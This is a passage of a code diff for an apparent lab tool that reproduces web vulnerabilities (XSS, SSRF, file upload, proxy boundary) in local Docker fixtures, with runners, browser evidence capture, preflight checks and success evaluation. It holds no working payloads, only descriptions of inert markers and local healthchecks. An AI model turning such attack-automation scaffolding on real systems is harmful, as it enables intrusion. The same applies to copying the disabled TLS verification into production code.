+        - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+baseline_urls:
+  - http://127.0.0.1:18203/
+ready_timeout_seconds: 45
+cleanup_policy: destroy
+destructive_risk: low
+allowed_target_types:
+  - lab-local
diff --git a/08-threat-intel/repro-profiles/system-family/nextjs-xss.yaml b/08-threat-intel/repro-profiles/system-family/nextjs-xss.yaml
new file mode 100644
index 00000000..b8453b1c
--- /dev/null
+++ b/08-threat-intel/repro-profiles/system-family/nextjs-xss.yaml
@@ -0,0 +1,64 @@
+profile_id: nextjs-xss
+system_id: nextjs
+match_rules:
+  keywords:
+    - xss
+    - scripting
+vuln_family: xss
+provisioning_mode: real
+verification_mode: real
+artifact_mode: local-fixture
+artifact_source:
+  strategy: local-minimal-fixture
+runner_id: nextjs.xss
+fixture_path: /Users/x/websafe/00-environments/templates/fixtures/nextjs/xss
+required_services:
+  - app
+seed_actions:
+  - kind: note
+    message: Seed client-rendering page for XSS proof capture.
+baseline_actions:
+  - kind: http-get
+    path: /
+attack_actions:
+  - kind: note
+    message: Runner injects inert payload and captures browser proof.
+browser_assertions:
+  required: true
+success_criteria:
+  - Browser proof page shows the XSS execution marker after the controlled payload.
+success_assertions:
+  - name: baseline-ok
+    type: baseline-ok
+  - name: runner-success
+    type: runner-success
+  - name: browser-present
+    type: browser-present
+services:
+  app:
+    image: node:22-alpine
+    working_dir: /workspace
+    command:
+      - node
+      - /workspace/00-environments/templates/fixtures/shared/node_fixture.mjs
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/nextjs/xss/scenario.json
+      PORT: "3000"
+    ports:
+      - 18204:3000
+    volumes:
+      - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+        - CMD-SHELL
+        - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+baseline_urls:
+  - http://127.0.0.1:18204/
+ready_timeout_seconds: 45
+cleanup_policy: destroy
+destructive_risk: low
+allowed_target_types:
+  - lab-local
diff --git a/08-threat-intel/repro-profiles/system-family/undici-ssrf.yaml b/08-threat-intel/repro-profiles/system-family/undici-ssrf.yaml
new file mode 100644
index 00000000..0026e0fe
--- /dev/null
+++ b/08-threat-intel/repro-profiles/system-family/undici-ssrf.yaml
@@ -0,0 +1,62 @@
+profile_id: undici-ssrf
+system_id: undici
+match_rules:
+  keywords:
+    - ssrf
+    - request forgery
+vuln_family: ssrf
+provisioning_mode: real
+verification_mode: real
+artifact_mode: local-fixture
+artifact_source:
+  strategy: local-minimal-fixture
+runner_id: undici.ssrf
+fixture_path: /Users/x/websafe/00-environments/templates/fixtures/undici/ssrf
+required_services:
+  - app
+seed_actions:
+  - kind: note
+    message: Seed local sink-only request path.
+baseline_actions:
+  - kind: http-get
+    path: /
+attack_actions:
+  - kind: note
+    message: Runner validates local callback using undici-style request fixture.
+browser_assertions:
+  required: false
+success_criteria:
+  - SSRF proof endpoint confirms only local sink callbacks were performed.
+success_assertions:
+  - name: baseline-ok
+    type: baseline-ok
+  - name: runner-success
+    type: runner-success
+services:
+  app:
+    image: node:22-alpine
+    working_dir: /workspace
+    command:
+      - node
+      - /workspace/00-environments/templates/fixtures/shared/node_fixture.mjs
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/undici/ssrf/scenario.json
+      PORT: "3000"
+    ports:
+      - 18301:3000
+    volumes:
+      - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+        - CMD-SHELL
+        - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+baseline_urls:
+  - http://127.0.0.1:18301/
+ready_timeout_seconds: 45
+cleanup_policy: destroy
+destructive_risk: low
+allowed_target_types:
+  - lab-local
diff --git a/08-threat-intel/repro-profiles/system-family/vite-file-upload.yaml b/08-threat-intel/repro-profiles/system-family/vite-file-upload.yaml
new file mode 100644
index 00000000..f9fd1579
--- /dev/null
+++ b/08-threat-intel/repro-profiles/system-family/vite-file-upload.yaml
@@ -0,0 +1,64 @@
+profile_id: vite-file-upload
+system_id: vite
+match_rules:
+  keywords:
+    - file upload
+    - upload
+vuln_family: file-upload
+provisioning_mode: real
+verification_mode: real
+artifact_mode: local-fixture
+artifact_source:
+  strategy: local-minimal-fixture
+runner_id: vite.file-upload
+fixture_path: /Users/x/websafe/00-environments/templates/fixtures/vite/file-upload
+required_services:
+  - app
+seed_actions:
+  - kind: note
+    message: Seed empty upload list for dev-server proof page.
+baseline_actions:
+  - kind: http-get
+    path: /
+attack_actions:
+  - kind: note
+    message: Runner uploads inert text marker only.
+browser_assertions:
+  required: true
+success_criteria:
+  - Uploaded inert marker is shown on the browser proof page.
+success_assertions:
+  - name: baseline-ok
+    type: baseline-ok
+  - name: runner-success
+    type: runner-success
+  - name: browser-present
+    type: browser-present
+services:
+  app:
+    image: node:22-alpine
+    working_dir: /workspace
+    command:
+      - node
+      - /workspace/00-environments/templates/fixtures/shared/node_fixture.mjs
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/vite/file-upload/scenario.json
+      PORT: "5173"
+    ports:
+      - 18402:5173
+    volumes:
+      - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+        - CMD-SHELL
+        - wget -q -O - http://127.0.0.1:5173/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+baseline_urls:
+  - http://127.0.0.1:18402/
+ready_timeout_seconds: 45
+cleanup_policy: destroy
+destructive_risk: low
+allowed_target_types:
+  - lab-local
diff --git a/08-threat-intel/repro-profiles/system-family/vite-proxy-boundary.yaml b/08-threat-intel/repro-profiles/system-family/vite-proxy-boundary.yaml
new file mode 100644
index 00000000..c4abb136
--- /dev/null
+++ b/08-threat-intel/repro-profiles/system-family/vite-proxy-boundary.yaml
@@ -0,0 +1,64 @@
+profile_id: vite-proxy-boundary
+system_id: vite
+match_rules:
+  keywords:
+    - proxy
+    - middleware
+vuln_family: proxy-boundary
+provisioning_mode: real
+verification_mode: real
+artifact_mode: local-fixture
+artifact_source:
+  strategy: local-minimal-fixture
+runner_id: vite.proxy-boundary
+fixture_path: /Users/x/websafe/00-environments/templates/fixtures/vite/proxy-boundary
+required_services:
+  - app
+seed_actions:
+  - kind: note
+    message: Seed proxy boundary fixture with baseline banner.
+baseline_actions:
+  - kind: http-get
+    path: /
+attack_actions:
+  - kind: note
+    message: Runner proves forwarded proxy boundary state change locally.
+browser_assertions:
+  required: true
+success_criteria:
+  - Proxy boundary proof banner is visible in the captured browser evidence.
+success_assertions:
+  - name: baseline-ok
+    type: baseline-ok
+  - name: runner-success
+    type: runner-success
+  - name: browser-present
+    type: browser-present
+services:
+  app:
+    image: node:22-alpine
+    working_dir: /workspace
+    command:
+      - node
+      - /workspace/00-environments/templates/fixtures/shared/node_fixture.mjs
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/vite/proxy-boundary/scenario.json
+      PORT: "5173"
+    ports:
+      - 18401:5173
+    volumes:
+      - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+        - CMD-SHELL
+        - wget -q -O - http://127.0.0.1:5173/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+baseline_urls:
+  - http://127.0.0.1:18401/
+ready_timeout_seconds: 45
+cleanup_policy: destroy
+destructive_risk: low
+allowed_target_types:
+  - lab-local
diff --git a/08-threat-intel/repro-profiles/system-family/vite-xss.yaml b/08-threat-intel/repro-profiles/system-family/vite-xss.yaml
new file mode 100644
index 00000000..99083ecb
--- /dev/null
+++ b/08-threat-intel/repro-profiles/system-family/vite-xss.yaml
@@ -0,0 +1,64 @@
+profile_id: vite-xss
+system_id: vite
+match_rules:
+  keywords:
+    - xss
+    - scripting
+vuln_family: xss
+provisioning_mode: real
+verification_mode: real
+artifact_mode: local-fixture
+artifact_source:
+  strategy: local-minimal-fixture
+runner_id: vite.xss
+fixture_path: /Users/x/websafe/00-environments/templates/fixtures/vite/xss
+required_services:
+  - app
+seed_actions:
+  - kind: note
+    message: Seed client render page before XSS proof capture.
+baseline_actions:
+  - kind: http-get
+    path: /
+attack_actions:
+  - kind: note
+    message: Runner stores inert payload and validates browser proof only locally.
+browser_assertions:
+  required: true
+success_criteria:
+  - Browser proof page shows the controlled XSS marker after attack.
+success_assertions:
+  - name: baseline-ok
+    type: baseline-ok
+  - name: runner-success
+    type: runner-success
+  - name: browser-present
+    type: browser-present
+services:
+  app:
+    image: node:22-alpine
+    working_dir: /workspace
+    command:
+      - node
+      - /workspace/00-environments/templates/fixtures/shared/node_fixture.mjs
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/vite/xss/scenario.json
+      PORT: "5173"
+    ports:
+      - 18403:5173
+    volumes:
+      - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+        - CMD-SHELL
+        - wget -q -O - http://127.0.0.1:5173/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+baseline_urls:
+  - http://127.0.0.1:18403/
+ready_timeout_seconds: 45
+cleanup_policy: destroy
+destructive_risk: low
+allowed_target_types:
+  - lab-local
diff --git a/scripts/lab/attack.py b/scripts/lab/attack.py
index 8dbdc6c2..9aceed84 100644
--- a/scripts/lab/attack.py
+++ b/scripts/lab/attack.py
@@ -4,6 +4,7 @@ import subprocess
 from pathlib import Path
 from typing import Any, Dict, List
 
+from lab.runners.dispatcher import run_attack as run_runner_attack
 from lab.utils import write_json
 
 
@@ -37,6 +38,9 @@ def _render_args(step: Dict[str, Any], profile: Dict[str, Any], advisory: Dict[s
 
 
 def run_attack(profile: Dict[str, Any], advisory: Dict[str, Any], run_dir: Path, dry_run: bool = False) -> Dict[str, Any]:
+    if profile.get("runner_id") and not dry_run:
+        return run_runner_attack(profile, advisory, run_dir)
+
     steps: List[Dict[str, Any]] = []
     for step in profile.get("attack_actions", []):
         tool_name = step.get("tool")
@@ -60,6 +64,8 @@ def run_attack(profile: Dict[str, Any], advisory: Dict[str, Any], run_dir: Path,
                     "result_path": str(output_path),
                 }
             )
+        elif step.get("kind") == "note" and not dry_run:
+            record["status"] = "completed"
         steps.append(record)
     payload = {"steps": steps}
     write_json(run_dir / "logs" / "attack.json", payload)
diff --git a/scripts/lab/baseline.py b/scripts/lab/baseline.py
index 3ba62be3..59e9d658 100644
--- a/scripts/lab/baseline.py
+++ b/scripts/lab/baseline.py
@@ -10,6 +10,7 @@ from lab.utils import write_json
 
 def collect(profile: Dict[str, Any], run_dir: Path, timeout: float = 8.0) -> Dict[str, Any]:
     observations: List[Dict[str, Any]] = []
+    steps: List[Dict[str, Any]] = []
     for url in profile.get("baseline_urls", []):
         try:
             response = requests.get(url, timeout=timeout, verify=False)
@@ -23,6 +24,41 @@ def collect(profile: Dict[str, Any], run_dir: Path, timeout: float = 8.0) -> Dic
             )
         except Exception as exc:
             observations.append({"url": url, "error": str(exc)})
-    payload = {"observations": observations}
+    base_url = str((profile.get("baseline_urls") or [""])[0]).rstrip("/")
+    for action in profile.get("baseline_actions", []) or []:
+        kind = action.get("kind", "note")
+        if kind == "note":
+            steps.append({"kind": kind, "status": "recorded", "message": action.get("message", "")})
+            continue
+        try:
+            if kind == "http-get":
+                path = action.get("path", "/")
+                response = requests.get(f"{base_url}{path}", timeout=timeout)
+                steps.append(
+                    {
+                        "kind": kind,
+                        "status": "completed",
+                        "path": path,
+                        "status_code": response.status_code,
+                        "body_excerpt": response.text[:200],
+                    }
+                )
+            elif kind == "http-post":
+                path = action.get("path", "/")
+                response = requests.post(f"{base_url}{path}", json=action.get("json", {}), timeout=timeout)
+                steps.append(
+                    {
+                        "kind": kind,
+                        "status": "completed",
+                        "path": path,
+                        "status_code": response.status_code,
+                        "body_excerpt": response.text[:200],
+                    }
+                )
+            else:
+                steps.append({"kind": kind, "status": "skipped", "message": "baseline action type not automated"})
+        except Exception as exc:
+            steps.append({"kind": kind, "status": "failed", "message": str(exc)})
+    payload = {"observations": observations, "steps": steps}
     write_json(run_dir / "logs" / "baseline.json", payload)
     return payload
diff --git a/scripts/lab/browser.py b/scripts/lab/browser.py
index e1eb704d..6a8f2df5 100644
--- a/scripts/lab/browser.py
+++ b/scripts/lab/browser.py
@@ -12,10 +12,12 @@ def capture(url: str, run_dir: Path, prefix: str = "baseline") -> Dict[str, Any]
         "present": False,
         "refs": [],
         "reason": "playwright runtime unavailable",
+        "error_kind": "import-error",
     }
     try:
         from playwright.sync_api import sync_playwright  # type: ignore
-    except Exception:
+    except Exception as exc:
+        payload["reason"] = f"playwright import failed: {exc}"
         write_json(run_dir / "logs" / f"{prefix}-browser.json", payload)
         return payload
 
@@ -33,11 +35,29 @@ def capture(url: str, run_dir: Path, prefix: str = "baseline") -> Dict[str, Any]
     final_url = url
     try:
         with sync_playwright() as p:
-            browser = p.chromium.launch(headless=True)
+            try:
+                browser = p.chromium.launch(headless=True)
+            except Exception as exc:
+                payload["reason"] = f"chromium launch failed: {exc}"
+                payload["error_kind"] = "launch-failed"
+                write_json(run_dir / "logs" / f"{prefix}-browser.json", payload)
+                return payload
             page = browser.new_page()
             page.on("console", lambda msg: console_messages.append({"type": msg.type, "text": msg.text}))
             page.on("request", lambda req: requests_seen.append({"method": req.method, "url": req.url}))
-            page.goto(url, wait_until="networkidle", timeout=20000)
+            response = page.goto(url, wait_until="networkidle", timeout=20000)
+            if response is None:
+                payload["reason"] = "page navigation returned no response"
+                payload["error_kind"] = "navigation-failed"
+                browser.close()
+                write_json(run_dir / "logs" / f"{prefix}-browser.json", payload)
+                return payload
+            if response.status >= 500:
+                payload["reason"] = f"page returned {response.status}"
+                payload["error_kind"] = "target-5xx"
+                browser.close()
+                write_json(run_dir / "logs" / f"{prefix}-browser.json", payload)
+                return payload
             page.screenshot(path=str(screenshot_path), full_page=True)
             dom_path.write_text(page.content(), encoding="utf-8")
             final_url = page.url
@@ -46,6 +66,7 @@ def capture(url: str, run_dir: Path, prefix: str = "baseline") -> Dict[str, Any]
             browser.close()
     except Exception as exc:
         payload["reason"] = str(exc)
+        payload["error_kind"] = "target-timeout" if "Timeout" in str(exc) else "navigation-failed"
         write_json(run_dir / "logs" / f"{prefix}-browser.json", payload)
         return payload
     write_json(console_path, console_messages)
@@ -63,6 +84,7 @@ def capture(url: str, run_dir: Path, prefix: str = "baseline") -> Dict[str, Any]
         "present": True,
         "page_title": page_title,
         "page_url": final_url,
+        "error_kind": None,
         "refs": [str(screenshot_path), str(dom_path), str(console_path), str(network_path), str(page_path)],
     }
     write_json(run_dir / "logs" / f"{prefix}-browser.json", payload)
diff --git a/scripts/lab/compose.py b/scripts/lab/compose.py
index 6d64d808..94032484 100644
--- a/scripts/lab/compose.py
+++ b/scripts/lab/compose.py
@@ -11,11 +11,22 @@ def compose_payload(profile: Dict[str, Any]) -> Dict[str, Any]:
     for service_name, service in profile.get("services", {}).items():
         payload = {
             "image": service["image"],
+            "networks": ["labnet"],
         }
         if service.get("ports"):
             payload["ports"] = service["ports"]
         if service.get("environment"):
             payload["environment"] = service["environment"]
+        if service.get("command"):
+            payload["command"] = service["command"]
+        if service.get("working_dir"):
+            payload["working_dir"] = service["working_dir"]
+        if service.get("volumes"):
+            payload["volumes"] = service["volumes"]
+        if service.get("healthcheck"):
+            payload["healthcheck"] = service["healthcheck"]
+        if service.get("build"):
+            payload["build"] = service["build"]
         if service.get("depends_on"):
             payload["depends_on"] = service["depends_on"]
         services[service_name] = payload
diff --git a/scripts/lab/doctor.py b/scripts/lab/doctor.py
new file mode 100644
index 00000000..17a851f7
--- /dev/null
+++ b/scripts/lab/doctor.py
@@ -0,0 +1,131 @@
+from __future__ import annotations
+
+import socket
+from contextlib import closing
+from typing import Any, Dict, Iterable, List, Tuple
+
+from lab.utils import command_available, run
+
+
+def _result(name: str, ok: bool, detail: str, **extra: Any) -> Dict[str, Any]:
+    payload = {"name": name, "ok": ok, "detail": detail}
+    payload.update(extra)
+    return payload
+
+
+def _parse_host_ports(profiles: Iterable[Dict[str, Any]]) -> List[Dict[str, Any]]:
+    ports: List[Dict[str, Any]] = []
+    for profile in profiles:
+        for service_name, service in (profile.get("services") or {}).items():
+            for binding in service.get("ports", []) or []:
+                host_port = None
+                value = str(binding)
+                parts = value.split(":")
+                if len(parts) == 3 and parts[1].isdigit():
+                    host_port = int(parts[1])
+                elif len(parts) >= 2 and parts[0].isdigit():
+                    host_port = int(parts[0])
+                elif value.isdigit():
+                    host_port = int(value)
+                if host_port is None:
+                    continue
+                ports.append(
+                    {
+                        "profile_id": profile.get("profile_id"),
+                        "service": service_name,
+                        "binding": value,
+                        "port": host_port,
+                    }
+                )
+    return ports
+
+
+def _port_available(port: int) -> bool:
+    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
+        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+        try:
+            sock.bind(("127.0.0.1", port))
+        except OSError:
+            return False
+    return True
+
+
+def _check_docker_cli() -> Dict[str, Any]:
+    ok = command_available("docker")
+    return _result("docker-cli", ok, "docker CLI available" if ok else "docker CLI is not installed")
+
+
+def _check_docker_daemon() -> Dict[str, Any]:
+    if not command_available("docker"):
+        return _result("docker-daemon", False, "docker CLI unavailable")
+    context = run(["docker", "context", "show"], check=False)
+    info = run(["docker", "info"], check=False)
+    detail = f"context={context.stdout.strip() or 'unknown'}"
+    if info.returncode != 0:
+        detail = info.stderr.strip() or info.stdout.strip() or "docker daemon unavailable"
+        return _result("docker-daemon", False, detail)
+    return _result("docker-daemon", True, detail or "docker daemon reachable")
+
+
+def _check_playwright_import() -> Dict[str, Any]:
+    try:
+        from playwright.sync_api import sync_playwright  # noqa: F401
+    except Exception as exc:
+        return _result("playwright-import", False, f"playwright import failed: {exc}")
+    return _result("playwright-import", True, "playwright Python package import passed")
+
+
+def _check_chromium_launch() -> Dict[str, Any]:
+    try:
+        from playwright.sync_api import sync_playwright
+    except Exception as exc:
+        return _result("playwright-browser", False, f"playwright import failed: {exc}")
+    try:
+        with sync_playwright() as playwright:
+            browser = playwright.chromium.launch(headless=True)
+            page = browser.new_page()
+            page.set_content("<html><body>ok</body></html>")
+            browser.close()
+    except Exception as exc:
+        return _result("playwright-browser", False, f"chromium launch failed: {exc}")
+    return _result("playwright-browser", True, "chromium runtime launch passed")
+
+
+def _check_ports(profiles: Iterable[Dict[str, Any]]) -> Dict[str, Any]:
+    requested = _parse_host_ports(profiles)
+    if not requested:
+        return _result("ports", True, "no host ports declared")
+
+    conflicts: List[Dict[str, Any]] = []
+    for item in requested:
+        if not _port_available(item["port"]):
+            conflicts.append(item)
+
+    if conflicts:
+        detail = ", ".join(
+            f"{item['port']}({item['profile_id']}::{item['service']})" for item in conflicts
+        )
+        return _result("ports", False, f"host ports already in use: {detail}", conflicts=conflicts)
+    return _result("ports", True, f"checked {len(requested)} host port bindings", bindings=requested)
+
+
+def run_checks(profiles: Iterable[Dict[str, Any]] | None = None) -> Dict[str, Any]:
+    selected = list(profiles or [])
+    checks = [
+        _check_docker_cli(),
+        _check_docker_daemon(),
+        _check_playwright_import(),
+        _check_chromium_launch(),
+        _check_ports(selected),
+    ]
+    ok = all(item["ok"] for item in checks)
+    failures = [item for item in checks if not item["ok"]]
+    return {
+        "status": "passed" if ok else "failed",
+        "ok": ok,
+        "checks": checks,
+        "profile_ids": [item.get("profile_id") for item in selected if item.get("profile_id")],
+        "failure_count": len(failures),
+        "summary": "; ".join(item["detail"] for item in failures) if failures else "all checks passed",
+    }
+
diff --git a/scripts/lab/evaluate.py b/scripts/lab/evaluate.py
new file mode 100644
index 00000000..ce890e18
--- /dev/null
+++ b/scripts/lab/evaluate.py
@@ -0,0 +1,100 @@
+from __future__ import annotations
+
+from typing import Any, Dict, List
+
+
+def _assertion(name: str, kind: str, passed: bool, detail: str) -> Dict[str, Any]:
+    return {
+        "name": name,
+        "kind": kind,
+        "passed": passed,
+        "detail": detail,
+    }
+
+
+def _baseline_ok(payload: Dict[str, Any]) -> bool:
+    observations = payload.get("observations", []) or []
+    if not observations:
+        return False
+    for item in observations:
+        if item.get("error"):
+            return False
+        status_code = item.get("status_code")
+        if status_code is None or int(status_code) >= 500:
+            return False
+    return True
+
+
+def _attack_steps_ok(payload: Dict[str, Any]) -> bool:
+    steps = payload.get("steps", []) or []
+    if payload.get("success") is True:
+        return True
+    if not steps:
+        return False
+    return not any(step.get("status") == "failed" for step in steps)
+
+
+def evaluate_run(
+    profile: Dict[str, Any],
+    provision_result: Dict[str, Any],
+    baseline_payload: Dict[str, Any],
+    attack_payload: Dict[str, Any],
+    browser_payload: Dict[str, Any],
+) -> Dict[str, Any]:
+    assertions: List[Dict[str, Any]] = []
+    configured = profile.get("success_assertions", []) or []
+    browser_required = bool(profile.get("browser_assertions", {}).get("required"))
+    if not configured:
+        configured = [
+            {"name": "baseline-ok", "type": "baseline-ok"},
+            {"name": "attack-steps", "type": "attack-steps-ok"},
+        ]
+        if browser_required:
+            configured.append({"name": "browser-present", "type": "browser-present"})
+
+    for item in configured:
+        assertion_type = item.get("type", "")
+        name = item.get("name") or assertion_type or "assertion"
+        if assertion_type == "runner-success":
+            passed = bool(attack_payload.get("success"))
+            detail = attack_payload.get("detail") or ("runner reported success" if passed else "runner did not confirm success")
+        elif assertion_type == "baseline-ok":
+            passed = _baseline_ok(baseline_payload)
+            detail = "baseline URLs responded without 5xx or transport errors" if passed else "baseline checks were incomplete"
+        elif assertion_type == "attack-steps-ok":
+            passed = _attack_steps_ok(attack_payload)
+            detail = "attack steps completed without failures" if passed else "attack steps failed or produced no usable result"
+        elif assertion_type == "browser-present":
+            passed = bool(browser_payload.get("present"))
+            detail = "browser evidence captured" if passed else (browser_payload.get("reason") or "browser evidence missing")
+        else:
+            passed = False
+            detail = f"unsupported assertion type: {assertion_type}"
+        assertions.append(_assertion(name, assertion_type, passed, detail))
+
+    blocked_reason = provision_result.get("blocked_reason")
+    if browser_required and not browser_payload.get("present"):
+        blocked_reason = blocked_reason or browser_payload.get("reason") or "browser evidence incomplete"
+
+    passed = all(item["passed"] for item in assertions)
+    artifact_mode = profile.get("artifact_mode", profile.get("provisioning_mode", "synthetic"))
+    verification_status = "triage-manual"
+    if provision_result.get("status") == "blocked-artifact":
+        verification_status = "blocked-artifact"
+    elif not passed:
+        verification_status = "triage-manual"
+        failed = next((item for item in assertions if not item["passed"]), None)
+        if failed and not blocked_reason:
+            blocked_reason = failed["detail"]
+    elif artifact_mode == "synthetic":
+        verification_status = "verified-synthetic"
+    else:
+        verification_status = "verified-real"
+
+    return {
+        "passed": passed and verification_status.startswith("verified-"),
+        "verification_status": verification_status,
+        "blocked_reason": blocked_reason,
+        "assertions": assertions,
+    }
+
diff --git a/scripts/lab/main.py b/scripts/lab/main.py
index 2fd99c3d..822447a3 100644
--- a/scripts/lab/main.py
+++ b/scripts/lab/main.py
@@ -11,7 +11,7 @@ SCRIPTS_DIR = CURRENT_DIR.parent
 if str(SCRIPTS_DIR) not in sys.path:
     sys.path.insert(0, str(SCRIPTS_DIR))
 
-from lab import attack, baseline, browser, catalog, evidence, provision, render, repro, seed, task_queue, validators  # noqa: E402
+from lab import attack, baseline, browser, catalog, doctor, evaluate, evidence, provision, render, repro, seed, task_queue, validators  # noqa: E402
 from lab.config import ADVISORIES_DIR, CASE_RUNS_DIR, ENV_PROFILES_DIR, RUNS_DIR  # noqa: E402
 from lab.utils import command_available, ensure_dir, isoformat, load_json_dir, now_utc, read_json, read_yaml, write_json  # noqa: E402
 
@@ -99,6 +99,7 @@ def _build_run_bundle(
     compose_refs: List[str],
     browser_evidence: Dict[str, Any],
     timeline: List[Dict[str, Any]],
+    success_evaluation: Dict[str, Any],
     started_at: str,
     finished_at: str,
     blocked_reason: str | None,
@@ -121,6 +122,9 @@ def _build_run_bundle(
         "request_log_refs": request_log_refs,
         "compose_refs": compose_refs,
         "timeline": timeline,
+        "success_evaluation": success_evaluation,
+        "historical_status": verification_status,
+        "latest_status": verification_status,
         "started_at": started_at,
         "finished_at": finished_at,
         "blocked_reason": blocked_reason,
@@ -141,6 +145,9 @@ def _dry_run_case_plan(advisory: Dict[str, Any], profile: Dict[str, Any], run_id
         "compose_services": sorted(profile.get("services", {}).keys()),
         "seed_actions": profile.get("seed_actions", []),
         "attack_actions": profile.get("attack_actions", []),
+        "runner_id": profile.get("runner_id"),
+        "fixture_path": profile.get("fixture_path"),
+        "success_assertions": profile.get("success_assertions", []),
         "compose_preview": provision_result.get("compose_preview", {}),
         "note": "dry-run only; no bundle, report, compose file, or registry update was written",
     }
@@ -159,7 +166,23 @@ def _execute_case(canonical_id: str, run_id: str | None = None, dry_run: bool =
     _timeline_event(timeline, "resolve-repro-profile", "completed", profile["profile_id"])
 
     run_dir = _run_dir(resolved_run_id)
-    provision_result = provision.prepare(profile, run_dir, dry_run=False)
+    doctor_result = doctor.run_checks([profile])
+    write_json(run_dir / "logs" / "doctor.json", doctor_result)
+    _timeline_event(
+        timeline,
+        "doctor",
+        "completed" if doctor_result.get("ok") else "failed",
+        doctor_result.get("summary", ""),
+    )
+
+    if doctor_result.get("ok"):
+        provision_result = provision.prepare(profile, run_dir, dry_run=False)
+    else:
+        provision_result = {
+            "compose_path": str(run_dir / "compose" / "compose.yaml"),
+            "status": "blocked-artifact",
+            "blocked_reason": doctor_result.get("summary", "doctor failed"),
+        }
     _timeline_event(
         timeline,
         "provision-compose-environment",
@@ -168,11 +191,39 @@ def _execute_case(canonical_id: str, run_id: str | None = None, dry_run: bool =
     )
     allow_runtime_steps = provision_result.get("status") not in {"blocked-artifact"}
     browser_required = bool(profile.get("browser_assertions", {}).get("required"))
+    compose_path = Path(provision_result.get("compose_path", run_dir / "compose" / "compose.yaml"))
+
+    ready_payload = {"status": "skipped", "detail": "provisioning blocked", "observations": []}
+    if allow_runtime_steps:
+        ready_payload = provision.wait_ready(profile, run_dir, compose_path)
+        allow_runtime_steps = ready_payload.get("status") == "completed"
+        _timeline_event(timeline, "wait-ready", ready_payload.get("status", "unknown"), ready_payload.get("detail", ""))
+    else:
+        _timeline_event(timeline, "wait-ready", "skipped", "provisioning blocked")
+
+    seed_payload = {"steps": [], "seeded": False}
+    if allow_runtime_steps:
+        seed_payload = seed.run_seed(profile, advisory, run_dir, dry_run=False)
+        seed_failed = any(step.get("status") == "failed" for step in seed_payload.get("steps", []))
+        _timeline_event(
+            timeline,
+            "seed-environment",
+            "failed" if seed_failed else "completed",
+            f"steps={len(seed_payload.get('steps', []))}",
+        )
+    else:
+        _timeline_event(timeline, "seed-environment", "skipped", "runtime steps unavailable")
 
     baseline_payload = {"observations": []}
     if profile.get("baseline_urls") and allow_runtime_steps:
         baseline_payload = baseline.collect(profile, run_dir)
-        _timeline_event(timeline, "baseline-snapshot", "completed", f"urls={len(profile.get('baseline_urls', []))}")
+        baseline_failed = any(item.get("error") for item in baseline_payload.get("observations", []))
+        _timeline_event(
+            timeline,
+            "baseline-snapshot",
+            "failed" if baseline_failed else "completed",
+            f"urls={len(profile.get('baseline_urls', []))}",
+        )
     else:
         _timeline_event(timeline, "baseline-snapshot", "skipped", "no baseline urls or provisioning blocked")
 
@@ -213,7 +264,6 @@ def _execute_case(canonical_id: str, run_id: str | None = None, dry_run: bool =
     elif browser_required:
         _timeline_event(timeline, "browser-replay-after-attack", "skipped", "proof browser capture unavailable")
 
-    compose_path = Path(provision_result["compose_path"])
     container_logs = evidence.collect_container_logs(run_dir, compose_path) if compose_path.exists() and allow_runtime_steps else []
     _timeline_event(
         timeline,
@@ -231,25 +281,31 @@ def _execute_case(canonical_id: str, run_id: str | None = None, dry_run: bool =
         "proof_refs": proof_browser.get("refs", []),
         "baseline_title": baseline_browser.get("page_title"),
         "proof_title": proof_browser.get("page_title"),
+        "error_kind": proof_browser.get("error_kind") or baseline_browser.get("error_kind"),
+        "reason": proof_browser.get("reason") or baseline_browser.get("reason"),
     }
 
-    blocked_reason = provision_result.get("blocked_reason")
-    if browser_required and not browser_present:
-        blocked_reason = blocked_reason or baseline_browser.get("reason") or proof_browser.get("reason") or "browser evidence incomplete"
-
     verification_mode = profile.get("verification_mode", "synthetic")
     artifact_mode = profile.get("artifact_mode", profile.get("provisioning_mode", "synthetic"))
-    verification_status = "triage-manual"
-    if provision_result.get("status") == "blocked-artifact":
-        verification_status = "blocked-artifact"
-    elif browser_required and not browser_present:
-        verification_status = "triage-manual"
-    elif any(step.get("status") == "failed" for step in attack_payload.get("steps", [])):
-        verification_status = "triage-manual"
-    elif artifact_mode == "synthetic":
-        verification_status = "verified-synthetic"
-    else:
-        verification_status = "verified-real"
+    success_evaluation = evaluate.evaluate_run(
+        profile=profile,
+        provision_result=provision_result,
+        baseline_payload=baseline_payload,
+        attack_payload=attack_payload,
+        browser_payload=browser_payload,
+    )
+    verification_status = success_evaluation["verification_status"]
+    blocked_reason = success_evaluation.get("blocked_reason")
+
+    cleanup_payload = {"status": "skipped", "detail": "cleanup_policy not destroy"}
+    if compose_path.exists() and profile.get("cleanup_policy") == "destroy":
+        cleanup_payload = provision.teardown(run_dir, compose_path)
+    _timeline_event(
+        timeline,
+        "cleanup-compose-environment",
+        cleanup_payload.get("status", "unknown"),
+        cleanup_payload.get("detail", ""),
+    )
 
     finished_at = isoformat(now_utc())
     bundle = _build_run_bundle(
@@ -267,6 +323,7 @@ def _execute_case(canonical_id: str, run_id: str | None = None, dry_run: bool =
         compose_refs=[str(compose_path)] if compose_path.exists() else [],
